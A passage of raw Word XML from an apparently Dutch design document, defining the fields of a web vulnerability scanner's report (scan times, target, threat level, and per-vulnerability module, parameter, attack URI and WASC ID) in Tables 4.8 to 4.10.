      <w:r w:rsidR="00AD33D9">
        <w:t>d naar de desbetreffende</w:t>
      </w:r>
      <w:r w:rsidR="002E16DC">
        <w:t>gebruiker</w:t>
      </w:r>
      <w:r w:rsidR="00AD33D9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F84011" w14:textId="6C816845"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00252659"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877897">
        <w:t>tappen om tot een oplossing voor</w:t>
      </w:r>
      <w:r w:rsidR="005D3D3D">
        <w:t xml:space="preserve"> het probleem te komen.</w:t>
      </w:r>
      <w:r w:rsidR="007E55A5">
        <w:t xml:space="preserve"> Het rapport bevat de volgende </w:t>
      </w:r>
      <w:r w:rsidR="007A0A1E">
        <w:t>data:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1844"/>
        <w:gridCol w:w="2876"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A654A" w14:paraId="2066F5F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gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="07DFAC8D" w14:textId="669E7897" w:rsidR="007A654A" w:rsidRDefault="005B2A3B" w:rsidP="008571B9">
            <w:r>
              <w:t>Algemene informatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="2E2E9BA1" w14:textId="77777777"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5C2F2FC" w14:textId="4D153B51" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Veld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02F091A8" w14:textId="4291655F"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1944AAD9" w14:textId="53F77D37" w:rsidTr="00FB2E65">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="114DDAB5" w14:textId="530082F8" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Start tijd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72CC0E12" w14:textId="73B5A1DB" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Start tijd van de scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="4A02968F" w14:textId="7C245B16"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A5B064B" w14:textId="63583DA7" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Eind tijd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="110D65AF" w14:textId="3FC845F4" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Eind tijd van de scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="6A9C2593" w14:textId="0DE8D706" w:rsidTr="00FB2E65">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6056B753" w14:textId="4B422D66" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Scan tijd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79C3E103" w14:textId="013082C0" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>De duur van de scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="6B24F811" w14:textId="2FC87DA9"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35A716A" w14:textId="6F568E50" w:rsidR="007A654A" w:rsidRDefault="00852CBB" w:rsidP="008571B9">
            <w:r>
              <w:t>Scan type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FBDB065" w14:textId="3D14C2D0" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Welke type van de scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="233AC87E" w14:textId="6D2D3AC9" w:rsidTr="00FB2E65">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0162DFAC" w14:textId="5C6E9C4F" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="492B752B" w14:textId="60826ED8" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>De URL van het Doelwit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="101AC3AA" w14:textId="42FBC609" w:rsidTr="00852C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44" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C9A186E" w14:textId="1A6F732B" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EA80D7F" w14:textId="06E32C23" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>De server waarop gehost wordt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00852CBB" w14:paraId="06F407A3"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23861DA3" w14:textId="53AF6562" w:rsidR="00852CBB" w:rsidRDefault="00852CBB" w:rsidP="008571B9">
            <w:r>
              <w:t>E-mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B2BB60D" w14:textId="0AD148FB" w:rsidR="00852CBB" w:rsidRDefault="00852CBB" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>E-mailadres</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00852CBB" w14:paraId="6FCA4CA5" w14:textId="77777777" w:rsidTr="00FB2E6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F46BF8B" w14:textId="5E5AFC06" w:rsidR="00852CBB" w:rsidRDefault="00852CBB" w:rsidP="008571B9">
            <w:r>
              <w:t>Klant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="682F0B1D" w14:textId="63834C2B" w:rsidR="00852CBB" w:rsidRDefault="00852CBB" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Naam klant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00852CBB" w14:paraId="6AEF8772"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5D9401A" w14:textId="60CC6E4C" w:rsidR="00852CBB" w:rsidRDefault="00852CBB" w:rsidP="008571B9">
            <w:r>
              <w:t>Bedrijf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A7D1085" w14:textId="1DB0383F" w:rsidR="00852CBB" w:rsidRDefault="00852CBB" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Naam bedrijf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04B47C3C" w14:textId="77270D96" w:rsidR="00687310" w:rsidRDefault="000F4055" w:rsidP="008571B9">
      <w:r>
        <w:t>Tabel 4.8</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="6616" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3405"/>
        <w:gridCol w:w="3211"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A654A" w14:paraId="55E7AB09"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6" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="0F6344AE" w14:textId="3EB7FC15" w:rsidR="007A654A" w:rsidRDefault="005B2A3B" w:rsidP="008571B9">
            <w:r>
              <w:t>Scan Informatie</w:t>
            </w:r>
            <w:r w:rsidR="007A654A">
              <w:t>pagina 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E811AE" w14:paraId="2EECD54E" w14:textId="77777777"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4083903D" w14:textId="4EBFD5E5" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Veld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3211" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12415B6A" w14:textId="307D93C0"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E811AE" w14:paraId="7A5B47CA" w14:textId="3B114C10" w:rsidTr="00E811AE">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B5DBB5E" w14:textId="0E0945B5" w:rsidR="007A654A" w:rsidRDefault="00F24984" w:rsidP="008571B9">
            <w:r>
              <w:t>Dreigingsniveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3211" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05E9EDFA" w14:textId="5421021F" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Niveau van dreiging. Hoog, gemiddeld, laag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E811AE" w14:paraId="541577FE" w14:textId="0AA69F45"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1ADE0486" w14:textId="41A6FEA6" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Totale dreigementen gevonden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3211" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52605122" w14:textId="1A5FFCE9" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>e.g. 25 dreigementen gevonden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E811AE" w14:paraId="0C67E2E0" w14:textId="5E660859" w:rsidTr="00E811AE">
        <w:trPr>
          <w:trHeight w:val="194"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14D059B9" w14:textId="08775CAE" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Samenvatting van de dreigementen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3211" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="180ED757" w14:textId="2C884ED4" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Dit bevat een overzicht van elke gevonden dreigement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="362DB7A2" w14:textId="30412BC1" w:rsidR="00390F17" w:rsidRDefault="000F4055" w:rsidP="008571B9">
      <w:r>
        <w:t>Tabel 4.9</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6609"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A5501" w14:paraId="5EA155DE" w14:textId="77777777" w:rsidTr="003A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25DB06D1" w14:textId="3E80D1F6" w:rsidR="003A5501" w:rsidRDefault="003A5501" w:rsidP="008571B9">
            <w:r>
              <w:t>Advies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A5501" w14:paraId="28B83974" w14:textId="77777777" w:rsidTr="003A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6E680C99" w14:textId="54A88E0F" w:rsidR="003A5501" w:rsidRDefault="003A5501" w:rsidP="003A5501">
            <w:r>
              <w:t>Advies over de betreffende module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04DCF8B8" w14:textId="4F38531E" w:rsidR="00E52256" w:rsidRDefault="000F4055" w:rsidP="008571B9">
      <w:r>
        <w:t>Tabel 4.10</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="6655" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1452"/>
        <w:gridCol w:w="5203"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A654A" w14:paraId="661793A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23EB6B4D" w14:textId="4075CD2D" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Kwetsbaarheden details</w:t>
            </w:r>
            <w:r w:rsidR="00837443">
              <w:t xml:space="preserve"> pagina 2..n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="4C98820C"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3158029" w14:textId="11C1D629" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Veld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AE27F08" w14:textId="5441A787"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6842AFA1" w14:textId="632B63BD" w:rsidTr="002F5798">
        <w:trPr>
          <w:trHeight w:val="292"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1452" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DCCF393" w14:textId="266571DD" w:rsidR="007A654A" w:rsidRDefault="003A5501" w:rsidP="008571B9">
            <w:r>
              <w:t>Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AA93428" w14:textId="638A0EA2" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Naam van kwetsbaarheid e.g. SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F5798" w14:paraId="74AB207D" w14:textId="77777777" w:rsidTr="002F57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52" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62D5184F" w14:textId="640A41FC" w:rsidR="002F5798" w:rsidRDefault="002F5798" w:rsidP="008571B9">
            <w:r>
              <w:t>Risico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24127F52" w14:textId="78925402" w:rsidR="002F5798" w:rsidRDefault="002F5798" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Dreigingsniveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="68F80343" w14:textId="1F2EBEED" w:rsidTr="002F5798">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1452" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="552B4C87" w14:textId="4302840E" w:rsidR="007A654A" w:rsidRDefault="002F5798" w:rsidP="008571B9">
            <w:r>
              <w:t xml:space="preserve">Target </w:t>
            </w:r>
            <w:r w:rsidR="007A654A">
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7923AEDB" w14:textId="3017FAB8" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Locatie waar kwetsbaarheid is gevonden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F5798" w14:paraId="6A8418A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A31DCE2" w14:textId="68B2E0BC" w:rsidR="002F5798" w:rsidRDefault="002F5798" w:rsidP="008571B9">
            <w:r>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05F386B9" w14:textId="6C6A1E8A" w:rsidR="002F5798" w:rsidRDefault="002F5798" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Parameter die gebruikt is</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="0B5C0EB3" w14:textId="686D2CA9" w:rsidTr="002F5798">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1452" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="280D34A6" w14:textId="4C4024B1" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Aanval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DA984E5" w14:textId="22FA3D09" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>De URI waarmee er een aanval is verricht</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F5798" w14:paraId="0EAA9FE5"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DF37BA4" w14:textId="42C4C951" w:rsidR="002F5798" w:rsidRDefault="002F5798" w:rsidP="008571B9">
            <w:r>
              <w:t>Error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20DB0DBC" w14:textId="126BF9F3" w:rsidR="002F5798" w:rsidRDefault="002F5798" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>De gevonden error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="39B6782E" w14:textId="7D8A90B4" w:rsidTr="002F5798">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1452" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="113BA9BD" w14:textId="282D61CA" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>WASC ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38EB660B" w14:textId="5DA02423" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:pPr>
